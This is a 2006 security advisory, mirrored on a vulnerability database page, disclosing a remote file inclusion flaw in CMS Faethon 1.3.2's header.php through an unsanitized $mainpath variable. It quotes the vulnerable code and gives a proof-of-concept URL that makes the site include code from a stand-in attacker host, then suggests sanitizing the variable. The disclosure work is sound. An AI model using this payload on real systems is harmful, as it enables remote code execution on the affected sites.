Lucene search

K

adv33-K-159-2006.txt

🗓️ 26 Jun 2006 00:00:00Reported by eufratoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

CMS Faethon 1.3.2 RFI Vulnerability in header.ph

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`____________________ ___ ___ ________  
\_ _____/\_ ___ \ / | \\_____ \   
| __)_ / \ \// ~ \/ | \   
| \\ \___\ Y / | \  
/_______ / \______ /\___|_ /\_______ /  
\/ \/ \/ \/   
  
.OR.ID  
ECHO_ADV_33$2006  
  
---------------------------------------------------------------------------  
[ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion  
---------------------------------------------------------------------------  
  
Author : M.Hasran Addahroni a.k.a K-159  
Date : June, 16th 2006  
Location : Indonesia, Bali  
Web : http://advisories.echo.or.id/adv/adv33-K-159-2006.txt  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
CMS Faethon   
  
Application : CMS Faethon   
version : 1.3.2  
URL : http://cmsfaethon.com/  
Description :  
  
CMS Faethon is content management system for different web pages.  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~~  
  
in folder data we found vulnerability script header.php.  
  
-----------------------header.php----------------------  
....  
<?php  
include($mainpath . 'survey.php');  
?>  
<h2>RSS - cmsfaethon.com</h2>  
<div class="rss-menu">  
<?php  
$source = 'http://cmsfaethon.com/feed/articles/rss2.php?LangSet=cs';  
include($mainpath . 'rss-reader.php');  
?>  
...  
----------------------------------------------------------  
  
Variables $mainpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.  
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~~  
  
http://target.com/[cms_faethon_path]/data/header.php?mainpath=http://attacker.com/evil.txt?  
  
Solution:  
~~~~~~~~~  
  
sanitize variabel $mainpath in header.php  
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~~  
~ ping - my dearest wife, for all the luv the tears n the breath   
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten  
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw  
~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit  
~ [email protected]   
~ #aikmel #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
K-159 || echo|staff || eufrato[at]gmail[dot]com  
Homepage: http://k-159.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4
27
.json
Report